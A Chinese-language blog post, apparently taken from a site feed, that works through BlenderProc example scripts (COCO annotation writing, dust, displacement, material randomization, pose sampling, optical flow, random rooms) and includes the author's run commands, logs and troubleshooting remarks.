    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
    existing_coco_annotations = json.load(fp)
    # 获取已存在图像 ID 的最大值,并加 1 作为图像编号的偏移量。这可以确保新生成的注释不会与已有的注释文件重复。
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
    else:
    # 如果 append_to_existing_output 参数为 False 或没有找到现有的注释文件,则图像编号的偏移量为 0,并且 existing_coco_annotations 变量设置为 None
    image_offset = 0
    existing_coco_annotations = None

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    # collect all RGB paths
    new_coco_image_paths = []
    # collect all mappings from csv (backwards compat)
    segcolormaps = []
    # collect all instance segmaps (backwards compat)
    inst_segmaps = []

    # for each rendered frame
    # 遍历从 bpy.context.scene.frame_start 到 bpy.context.scene.frame_end 的每一帧
    for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

    # 如果 instance_attribute_maps 列表为空,则读取映射文件(segcolormap_output)以获取对象名称/类别到整数的映射,将其存储在 segcolormaps 列表中
    if not instance_attribute_maps:
    # read colormappings, which include object name/class to integer mapping
    segcolormap = []
    with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
    reader = csv.DictReader(csvfile)
    for mapping in reader:
    segcolormap.append(mapping)
    segcolormaps.append(segcolormap)

    # 如果 instance_segmaps 列表为空,则读取分割图像文件(segmentation_map_output)并提取实例通道(即 channel_instance),将实例分割图像存储在 inst_segmaps 列表中
    if not instance_segmaps:
    # Load segmaps (backwards compat)
    segmap = np.load(segmentation_map_output["path"] % frame)
    inst_channel = int(segcolormap[0]['channel_instance'])
    inst_segmaps.append(segmap[:, :, inst_channel])

    # 如果 colors 列表非空,则该代码调用 opencv 库的 imwrite() 函数将 RGB 图像(颜色渲染图像)写入目标路径,具体路径由 file_prefix 和偏移量计算得到
    if colors:
    color_rgb = colors[frame - bpy.context.scene.frame_start]

    # Reverse channel order for opencv
    color_bgr = color_rgb.copy()
    color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

    if color_file_format == 'PNG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr)
    elif color_file_format == 'JPEG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
    else:
    raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

    else:
    # 如果没有特定的颜色方案,则直接复制 RGB 渲染图像到目标路径
    source_path = rgb_output["path"] % frame
    target_base_path = os.path.join('images',
    file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
    target_path = os.path.join(output_dir, target_base_path)
    shutil.copyfile(source_path, target_path)

    # 将目标路径(target_path)添加到 new_coco_image_paths 数组中,并在 COCO 格式注释中使用这个数组
    new_coco_image_paths.append(target_base_path)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
    instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

    coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
    instance_attribute_maps,
    new_coco_image_paths,
    supercategory,
    mask_encoding_format,
    existing_coco_annotations,
    label_mapping)

    print("Writing coco annotations to " + coco_annotations_path)
    with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
    json.dump(coco_output, fp, indent=indent)

    这段代码将收集到的实例分割图像、属性映射文件、图像路径和其他参数传递给 _CocoWriterUtility.generate_coco_annotations() 函数,生成符合 COCO 格式的注释。如果存在旧的 COCO 格式的注释(即 existing_coco_annotations),则将其合并到生成的注释中。

    最后,将这些注释写入给定的 coco_annotations_path 文件中,并在控制台中输出写入的文件路径。

    Diffuse color image

    Usage

    1
    blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    • examples/advanced/diffuse_color_image/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/diffuse_color_image/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5

    png

    Code

    1
    2
    # Also enable the diffuse color image, which describes the base color of the textures
    bproc.renderer.enable_diffuse_color_output()

    How to apply dust to objects

    Usage

    1
    blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    • examples/advanced/dust/main.py: path to the main python file to run.
    • resources/haven/models/ArmChair_01/ArmChair_01.blend: Path to the blend file, from the haven dataset, browse the model folder, for all possible options
    • resources/haven: The folder where the hdri folder can be found, to load an world environment
    • examples/datasets/haven/output: path to the output directory.

    这玩意儿老是坑,妈的

    Little Paris Eiffel Tower HDRI • Poly Haven 里下载一些 Models 和 HDRIS:

    png

    这个网站的资源都是开源免费的,不错啊!

    png

    png

    设置好路径开跑!

    1
    blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output

    然后就寄,不明白为什么这里 glob.glob 会返回空列表,换个代码重写,然后这坨臭臭代码就能跑了。

    png

    Visualization

    1
    blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    # load the objects into the scene
    obj = bproc.loader.load_blend(args.model)[0]

    haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
    bproc.world.set_world_background_hdr_img(haven_hdri_path)
    1. 使用 bproc.loader.load_blend(args.model) 函数加载在 args.model 变量中指定的 Blender 模型文件。该函数返回一个对象列表,我们将其中的第一个对象存储在变量 obj 中。
    2. 使用 bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path) 函数从指定的路径中获取一个随机的 HDR 图像文件路径。该函数会检查 args.hdri_path 目录下的所有 .hdr 文件,并从中随机选择一个返回。
    3. 最后,使用 bproc.world.set_world_background_hdr_img(haven_hdri_path) 函数,将选择的 HDR 图像文件路径设置为 Blender 环境的背景图像。这使得 3D 模型文件与所选择的 HDR 图像组合成为一个逼真的场景。

    1
    2
    3
    # Add dust to all materials of the loaded object
    for material in obj.get_materials():
    bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)

    这段代码的作用是向已经加载到 Blender 中的模型对象的所有材质(material)中添加灰尘效果。

    具体而言,代码执行了以下几个步骤:

    1. 使用 obj.get_materials() 方法从 obj 对象中获取所有的材质,并使用 for 循环遍历每一个材质。

    2. 在循环中,使用 bproc.material.add_dust(material, strength=0.8, texture_scale=0.05) 函数向当前遍历的材质中添加灰尘。该函数接受三个参数:

      • material:要添加灰尘的材质对象。
      • strength:灰尘的强度,默认为 0.5。
      • texture_scale:灰尘纹理的缩放比例,默认为 0.01。

      相关的代码将根据这些参数将灰尘纹理应用于材质,从而使其看起来更加逼真。

    因此,这段代码使您能够轻松地向已经加载到 Blender 中的模型对象添加灰尘效果,从而使其看起来更加逼真。

    Object selection and manipulation using displacement modifier

    该示例演示了如何使用不同纹理添加不同位移修饰符作为 EntityManipulator 模块的一部分来操作实体。

    Usage

    1
    blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # Add displacement to all objects
    for obj in objs:
    # Create a uv mapping based on a cylinder projection
    obj.add_uv_mapping("cylinder")

    # Create a random procedural texture
    texture = bproc.material.create_procedural_texture('CLOUDS')
    # Displace the vertices of the object based on that random texture
    obj.add_displace_modifier(
    texture=texture,
    strength=random.gauss(0, 0.5),
    subdiv_level=random.randint(1, 3),
    )

    如果一个对象没有 UV 映射,我们将添加一个,因为它对于将位移纹理映射到对象是必要的。对于 UV 映射,我们选择使用 projection。Blender 给出的可能的投影类型有:“cube”、“cylinder”、“smart” 和 “sphere”。

    然后,我们为每个实体添加了一个带有随机纹理的位移修饰符。

    • strength 是几何体位移的量。我们在这里使用高斯分布对 strength 进行采样,均值为 0.0,标准差为 0.5
    • 如果应用子细分,则 subdiv_level 定义要在实体上执行的子细分数量。在本示例中,我们使用了一个或两个子细分。
    • mid_level 是文理值,将被处理为无位移的修饰符。纹理值低于此阈值将导致沿所选方向的负位移,而高于此阈值的纹理值将导致正位移。displacement = texture_value - mid_level。请记住,在 Blender 中,颜色/亮度值通常在(0.0 到 1.0)之间,而不是(0 到 255)之间。
    • 通过添加一个值到 min_vertices_for_subdiv,我们可以检查实体是否需要子细分修饰符。如果实体的顶点少于 min_vertices_for_subdiv,则会添加一个 Subdivision 材质,以增加顶点的数量。实体的顶点数对于位移修饰符有很大的影响。如果顶点不足,则位移修饰符效果不好。

    Camera lens distortion generation and validation

    该程序会生成典型的 BlenderProc 虚拟场景和已知姿态和内参的精确测量的相机校准板的扭曲图像(RGB、深度和法线)。后者将用于验证我们的几何相机模型,通过比较生成的图像与真实图像。

    emmmm 这个我应该用不到。

    Usage

    Standard Scene:

    1
    blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output

    png

    simple calibration image by loading intrinsics and extrinsics from a file:

    1
    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output

    png

    fairly distorted image:

    1
    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output

    png

    • 加载对象;将它们定位到世界参考帧的原点。
    • 创建一个点光源。
    • 设置相机内参,包括镜头畸变参数。
    • 初始化所有生成的无畸变图像(通常比所需的分辨率更高)的无畸变到畸变坐标映射,最终将其进行扭曲。
    • 对于第一个示例,或者加载使用相机校准软件(例如 DLR CalLab v1)测量得到的相机姿态,对相机与物体姿态进行采样。
    • 渲染 RGB、深度和法线图像。
    • 应用镜头畸变(对于时间上的、高分辨率的中间 Blender 图像),然后将它们裁剪到所需的分辨率。
    • 将畸变数据写入 .hdf5 容器。
    • 通过将生成的图像与参考真实图像 ./images/lens_img1_real.jpg./images/lens_img2_real.png 进行比较来进行测试。

    Material Randomization

    Usage

    1
    blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
    • examples/advanced/material_randomizer/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/material_randomizer/output: path to the output directory.

    Visualizaton

    多次运行结果,Material 一般不同:

    png

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # Collect all materials
    materials = bproc.material.collect_all()

    # Go through all objects
    for obj in objs:
    # For each material of the object
    for i in range(len(obj.get_materials())):
    # In 50% of all cases
    if np.random.uniform(0, 1) <= 0.5:
    # Replace the material with a random one
    obj.set_material(i, random.choice(materials))

    这段代码的作用是对已经加载到 Blender 中的所有对象进行操作,随机替换这些对象的材质。

    具体而言,代码执行了以下几个步骤:

    1. 首先使用 for obj in objs: 循环遍历所有在 Blender 环境中加载的对象,并对每个对象执行以下操作。
    2. 在循环中,对于当前遍历对象的每一个材质,使用 for i in range(len(obj.get_materials())): 进行循环遍历。
    3. 在每次循环中,使用 np.random.uniform(0, 1) 函数生成一个 0 到 1 之间的随机数,并判断是否小于等于 0.5,即 50% 的概率。如果是,则执行以下操作。
    4. 使用 obj.set_material(i, random.choice(materials)) 函数将当前遍历的材质替换为从 materials 列表中随机选择的一个材质。其中,materials 列表是预先定义的包含多种材质的列表。

    因此,这段代码使您能够轻松地对已经加载到 Blender 中的所有对象进行操作,并以一定的概率随机更改它们的材质,可以为渲染器提供更丰富和多样化的渲染效果。

    Motion Blur and Rolling Shutter

    在这个例子中,我们展示如何生成运动模糊和滚动快门效果。

    这些效果是可见的,如果相机或对象在帧之间移动。相机在物体静止的情况下经历以下运动:

    1
    2
    3
    4
    5
    0 -10 4 1.3 0 0 # initial position
    0 -15 4 1.3 0 0 # moving away from object
    5 -15 4 1.3 0 0 # moving to the right
    5 -15 8 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    1
    blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output

    跑不动,西内。

    Object pose sampling

    这个例子的重点是介绍 object.ObjectPoseSampler,它允许在采样体积内进行带有碰撞检查的对象姿态采样。

    Usage

    1
    blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
    • examples/advanced/object_pose_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/object_pose_sampling/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # Define a function that samples the pose of a given object
    def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

    # Sample the poses of all objects, while making sure that no objects collide with each other.
    bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs
    )

    定义一个函数,采样并设置对象的位置和旋转。对象被放置在采样的姿态上,并对 objects_to_check_collisions 指定的所有对象执行碰撞检查(默认为所有对象)。如果发生碰撞,位置将被重置,并尝试重新采样。最大尝试次数可以由 max_tries 定义。

    On surface object pose Sampling

    这个示例的重点是 OnSurfaceSampler,它允许对所选表面上的某些对象进行姿态采样。

    Usage

    1
    blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
    • examples/advanced/on_surface_object_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/on_surface_object_sampling/scene.blend: path to the object file with the basic scene.
    • examples/advanced/on_surface_object_sampling/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5

    png

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # Define a function that samples the pose of a given object
    def sample_pose(obj: bproc.types.MeshObject):
    # Sample the spheres location above the surface
    obj.set_location(bproc.sampler.upper_region(
    objects_to_sample_on=[surface],
    min_height=1,
    max_height=4,
    use_ray_trace_check=False
    ))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

    这段代码的作用是定义一个函数 sample_pose,并使用该函数对已经加载到 Blender 中的模型对象进行姿态采样操作。

    具体而言,代码执行了以下几个步骤:

    1. 首先定义了一个名为 sample_pose 的函数,函数的输入参数为一个 bproc.types.MeshObject 类型的对象 obj,表示需要进行姿态采样的模型对象。函数内部执行了以下操作:
      • 使用 bproc.sampler.upper_region() 函数对当前对象进行位置采样,生成一个位置矢量,并使用 obj.set_location() 方法将该位置矢量设置为当前模型对象的位置。在此处,我们使用以下参数配置:
        • objects_to_sample_on:一个 List[bproc.types.Object] 类型的列表,表示采样参考物体的集合。在这里,我们将表面 object 添加到采样参考物体中。
        • min_heightmax_height:分别表示采样位置的最小高度和最大高度。在这里,我们将其设为 1 和 4,表示采样位置在表面 object 的上方 1 到 4 个单位长度之间。
        • use_ray_trace_check:一个布尔值,表示是否使用光线跟踪检查避免生成的位置与其他物体相交。在这里,我们将其设置为 False,即不进行光线跟踪检查。
      • 使用 np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]) 函数生成一个随机欧拉角矢量,并使用 obj.set_rotation_euler() 方法将该欧拉角矢量设置为当前模型对象的旋转。
    2. 在完成函数定义后,该函数可以用于对已经加载到 Blender 中的模型对象进行位置采样和姿态采样操作,从而增加渲染效果的多样性和逼真性,特别是当需要将某个物体放置在表面上方时。

    因此,这段代码提供了一种简单的方法来对模型对象进行采样操作,并可扩展成复杂的采样逻辑,从而为渲染器提供更加丰富和逼真的场景渲染效果。

    1
    2
    # Sample the spheres on the surface
    spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)

    设置刚体:

    1
    2
    3
    4
    # Enable physics for spheres (active) and the surface (passive)
    for sphere in spheres:
    sphere.enable_rigidbody(True)
    surface.enable_rigidbody(False)

    物理模拟:

    1
    2
    # Run the physics simulation
    bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)

    Optical Flow

    在本示例中,我们演示了如何获取连续关键帧之间的前向/后向流值。

    如果相机或物体在帧之间移动,则流会变得可见。在这里,相机经过以下运动:

    1
    2
    3
    4
    5
    0 -10 4 1.3 0 0  # initial position
    0 -12 4 1.3 0 0 # moving away from object
    2 -12 4 1.3 0 0 # moving to the right
    2 -12 6 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    1
    blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
    • examples/advanced/optical_flow/main.py: path to the main python file to run.
    • examples/advanced/optical_flow/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/optical_flow/output: path to the output directory.

    Usage

    1
    blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5

    png

    Code

    1
    2
    # Render the optical flow (forward and backward) for all frames
    data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
    • 遍历所有相机位姿并渲染前向和/或后向光流。
    • 使用 .exr 格式渲染图像,该格式允许线性颜色空间和更高的精度,然后将其转换为 numpy.float32 数组。
    • 默认情况下,Blender 使用左下角作为坐标系统原点。OpenCV 和流行的 Flow 数据集使用上部左角。如果要使用默认的 Blender 行为,请更改标志 "blender_image_coordinate_style": True。请注意,可视化中的颜色将不同!

    Convex decomposition for generating stable and exact collision shapes

    在 Blender 中运行物理模拟时,选择正确的碰撞形状对于实现稳定结果至关重要。虽然使用 CONVEX_HULL 碰撞形状可以获得非常稳定的模拟结果,但对于非凸面体对象(例如,浮动的物体),结果可能看起来非常不切实际。MESH 碰撞形状允许进行更精确的碰撞,但模拟也会变得非常不稳定,物体可能会相互穿透。

    CONVEX_DECOMPOSITION 是两者之间的折衷方案:使用 V-HACD 算法 将给定的非凸面体对象分解成多个近似凸部分。这些部分的并集可以用作物体的精确且稳定的碰撞形状。

    在这个例子中,我们加载了一个垃圾箱和一些高度非凸面体的 ShapeNet 对象,应用凸分解生成碰撞形状,然后让这些物体掉进垃圾箱里。

    不好下数据集+感觉用不到,give up!

    Random Backgrounds

    jpg

    在这个例子中,我们生成了一个物体 (Suzanne) 的渲染图像,并将它们粘贴到随机的背景图像上,随机化对象的位置、方向、材质属性和照明。这是一种简单的方法来生成用于训练分类、物体检测和分割任务的数据。它易于实现和使用,但与实际 3D 场景中的物体渲染相比通常会导致较差的结果。

    Usage

    1
    blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
    • examples/advanced/random_backgrounds/main.py: path to the main python file to run.
    • examples/advanced/random_backgrounds/object.ply: path to the object file.
    • examples/advanced/random_backgrounds/output: path to the output directory.

    emmm就是渲染一个不含背景的图片,然后把背景换成其他的。

    然后再:

    1
    python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite

    添加背景。

    Code

    1
    2
    # Enable transparency so the background becomes transparent
    bproc.renderer.set_output_format(enable_transparency=True)

    这段代码的作用是启用 Blender 内置渲染器的透明背景功能,使得渲染输出结果中的背景变为透明的。

    具体而言,代码执行了以下操作:

    1. 首先调用了 bproc.renderer 模块下的 set_output_format() 函数,该函数用于设置渲染输出格式。在此,我们设置了一个参数 enable_transparency=True,用于启用透明背景功能。
    2. 启用透明背景功能后,当使用 Blender 渲染器进行渲染时,原本的背景将会被自动设为透明色,从而能够与其他软件进行无缝合成和叠加。

    因此,这段代码可以帮助您快速启用 Blender 渲染器的透明背景功能,方便进行后续的图像处理和合成操作。

    Random Room Constructor

    这个例子解释了 RandomRoomConstructor。该模块可以构建随机房间,并在其中放置从其他模块加载的对象。

    本例使用了 CCMaterialLoader。所以要下载 cc_textures 的纹理,我们提供了一个脚本。它还使用了 IkeaLoader,请参见 Ikea 的例子。

    这两者都需要使用才能使用此示例。

    又不好下载,give up!

    Code

    1
    2
    3
    4
    5
    # Load materials and objects that can be placed into the room
    materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
    interior_objects = []
    for i in range(15):
    interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))

    通过脚本下载了 cctextures,这里仅使用名称列表中包含其中一个名称的资产。这使得它更加真实,因为像 "Asphalt" 这样的东西通常不会在室内发现。此外,也从指定的 Ikea 数据集类别中加载了 15 个对象。

    1
    2
    3
    4
    # Construct random room and fill with interior_objects
    objects = bproc.constructor.construct_random_room(used_floor_area=25,
    interior_objects=interior_objects,
    materials=materials, amount_of_extrusions=5)

    construct_random_room 构建了一个随机的地面平面,并构建了相应的墙壁和天花板。它将加载的 Ikea 对象随机放置在位置,并设置 cc-texture 材料。房间的地面面积为 25 平方米,它最多有 5 个挤出。挤出是一种走廊,它从中间的基本矩形中伸出。它们可以更宽或更窄,但永远不会小于最小的 corridor_width。模块将自动将 25 平方米分配到所有挤出部分中。

    1
    2
    # Bring light into the room
    bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)

    让天花板发光,并移除放置在其上的任何材料。

    ]]>
    @@ -6292,7 +6292,7 @@ /posts/Blender-BlenderProc%20Examples%20overview-Basic%20Examples/ - 资源

    仓库地址:DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com),下载到本地,用 python 打开,解释器使用之前创建的 blender 环境。

    正文

    Basic example

    Usage

    示例代码在 examples/basics/basic/main.py 中。shell 中输入:

    blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output

    即可开跑!我说婷婷,会报错:

    It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
    Gonna try to download it automatically.
    Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: The read operation timed out.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: <urlopen error timed out>.

    我设了个全局代理和 TUN 模式再多跑几次就可以了 orz

    png

    这么看从网上下载 freeimage-3.15.1-win64.dll,然后放到 C:\Users\XXXX\AppData\Local\imageio\freeimage\ 下也是可以的!

    File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.
    Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
    Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
    Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
    Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
    Selecting render devices...
    Device NVIDIA GeForce RTX 4060Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Timer 'OBJ_import' took 1.5ms
    Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
    Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

    ...

    Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
    Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
    Time: 00:01.36 (Saving: 00:00.30)

    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

    ...

    Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
    Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
    Time: 00:00.86 (Saving: 00:00.01)

    Merging data for frame 0 into examples/basics/basic/output\0.hdf5
    Merging data for frame 1 into examples/basics/basic/output\1.hdf5

    Blender quit
    Cleaning temporary directory

    Visualization

    blenderproc vis hdf5 examples/basics/basic/output/0.hdf5

    渲染了 colors、depth、normals 三张图片:

    png

    Code

    接受三个 parser 参数:

    • examples/resources/camera_positions:相机参数文本文件。

    png

    第一行数据表示相机位于 (0, -13.741, 4.1242) 的位置,其绕 x 轴旋转角度为 1.3,绕 y 轴旋转角度为 0,绕 z 轴旋转角度为 0。

    第二行数据表示相机位于 (1.9488, -6.5202, 0.23291) 的位置,其绕 x 轴旋转角度为 1.84,绕 y 轴旋转角度为 0,绕 z 轴旋转角度为 0.5。

    • examples/resources/scene.obj:obj 文件,basic scene 的信息。

    png

    这是一个 Wavefront OBJ 文件,它是一种 3D 对象文件格式。该文件包含了多个物体:“Cube” 和 “Cube.001” 等。

    在文件的开头,有一行 “mtllib scene.mtl”,表示该文件引用了一个名为 “scene.mtl” 的材质库文件,其中定义了这些物体所使用的材质/纹理信息。

    接下来,通过使用 “v”,“vt”,和 “vn” 关键字定义了每一个物体的顶点位置、纹理坐标和法向量。

    具体来说,每一个 “v” 后面的三个数值表示一个顶点的 x,y 和 z 坐标;

    每一个 “vt” 后面的两个数值表示一个纹理坐标值,在这个文件中,它们是相对于材质图像的位置;

    每一个 “vn” 后面的三个数值表示一个法向量的 x,y 和 z 分量。

    下面排列的 “f” 行表示了多边形,每一个 “f” 后面跟随着一些数字,这些数字表示该多边形的组成部分。

    在这个文件中,不同的数字之间使用斜线 “/” 分隔。

    具体来说,每一个数字表示该物体的一个顶点,该顶点由前面的 “v” 行中相应编号的顶点位置信息定义,而后面的数字则来自前面的 “vt” 和 “vn” 行。

    每一行的最后一个数字是该多边形的法向量,这个法向量来自 “vn” 行,指定了多边形所在平面的朝向。

    “s off” 表示关闭了 smooth shading,即不使用平滑着色技术。

    • examples/basics/basic/output:输出文件路径
    import blenderproc as bproc
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
    parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
    parser.add_argument('output_dir', help="Path to where the final files, will be saved, could be examples/basics/basic/output")
    args = parser.parse_args()

    初始化 blenderproc:

    bproc.init()

    args.scene 中载入模型场景:

    objs = bproc.loader.load_obj(args.scene)

    载入灯光:

    # define a light and set its location and energy level
    light = bproc.types.Light()
    light.set_type("POINT")
    light.set_location([5, -5, 5])
    light.set_energy(1000)

    载入相机:这段代码的作用是设置相机分辨率,并读取相机位置信息并转换为齐次相机-世界变换矩阵。

    # define the camera resolution
    # 首先,调用 bproc.camera.set_resolution() 函数来定义相机的分辨率,该函数接受两个参数,即相机图像的宽度和高度。在这个示例中,我们将相机分辨率设置为 512x512。
    bproc.camera.set_resolution(512, 512)

    # read the camera positions file and convert into homogeneous camera-world transformation
    with open(args.camera, "r") as f:
    for line in f.readlines():
    # 使用一个 for 循环来逐行读取相机位置文件中的信息,并将每个位置信息转换为齐次变换矩阵,并通过调用 bproc.camera.add_camera_pose() 函数将其添加到 BlenderProc 中。
    line = [float(x) for x in line.split()]
    position, euler_rotation = line[:3], line[3:6]
    matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
    bproc.camera.add_camera_pose(matrix_world)

    渲染图像:

    # activate normal and depth rendering
    bproc.renderer.enable_normals_output()
